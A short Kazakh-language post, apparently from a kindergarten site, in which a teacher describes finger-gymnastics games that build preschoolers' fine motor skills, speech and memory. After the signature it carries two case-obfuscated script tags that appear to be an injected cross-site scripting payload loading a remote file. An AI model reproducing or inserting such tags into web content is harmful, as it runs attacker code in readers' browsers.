Текст
Мектеп жасына дейінгі балаларға арналған саусақ гимнастикасы олардығ өмірінде үлкен рөл атқарады. Саусақ ойындарының басты мақсаты-қолдың ұсақ моторикасын дамыту. Бұл сөйлеуді дамыту, қол бұлшықеттерін нығайту үшін қажет. Олар сондай-ақ баланың ептілігі мен ұтқырлығын жақсартуға, қозғалыстарды үйлестіруді және реакция жылдамдығын жақсартуға көмектеседі. "Інжу" тобының балалары үнемі саусақ ойындарымен айналысады. Саусақ ойындарында көп нәрсені есте сақтау керек: саусақтардың орналасуы, қозғалыстардың реттілігі және жай айтылатын өлеңдер. Бұл баланың есте сақтау қабілетін дамытуға арналған керемет көңілді жаттығу! Тәрбиеші: Откульбаева С. М.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Просмотров: 372

